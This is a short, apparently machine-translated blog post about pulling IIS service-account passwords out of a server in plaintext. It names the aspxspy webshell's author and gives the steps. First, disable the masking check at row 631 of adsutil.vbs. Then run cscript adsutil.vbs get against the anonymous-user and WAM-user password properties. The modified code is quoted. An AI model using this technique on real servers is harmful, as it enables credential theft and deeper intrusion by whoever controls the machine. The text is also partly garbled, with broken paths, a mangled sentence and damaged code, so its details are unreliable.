When I visited the Blog of Bin niu (author of aspxspy) Today, I suddenly noticed that his earlier log mentioned that the IIS user name and password seem to be saved in plaintext, however, I did not explain how to find the plaintext password.
Finally, I tried to reset the iispassword in the previous example, and set the iispassword to cscript.exe adsutil. vbs set xxxxxx. If there is a set, get will also be available in most cases. If you check the usage, you can read the adsutil. vbs code. After all, vbs is a plaintext script, so it is easier to find a method.
Simple:
C: change the value of True in row 631 of InetpubAdminScriptsadsutil. vbs to False.
Then execute
Cscript.exe adsutil. vbs get w3svc/anonymoususerpass
Cscript.exe adsutil. vbs get w3svc/wamuserpass
The Code is as follows:
========================================================== ======================================
If (UCase (IIsSchemaObject. Syntax) = "STRING") Then
If (IsSecureProperty (ObjectParameter, MachineName) = False) Then is modified here, row 631
ValueDisplay = ValueDisplay &""""&"**********"&""""
Else
ValueDisplay = ValueDisplay & "& ValueList &""""
End If
ElseIf (UCase (IIsSchemaObject. Syntax) = "BINARY") Then
========================================================== ======================================
No picture, no truth (this sentence is referenced by o (operator _ operator) o ...)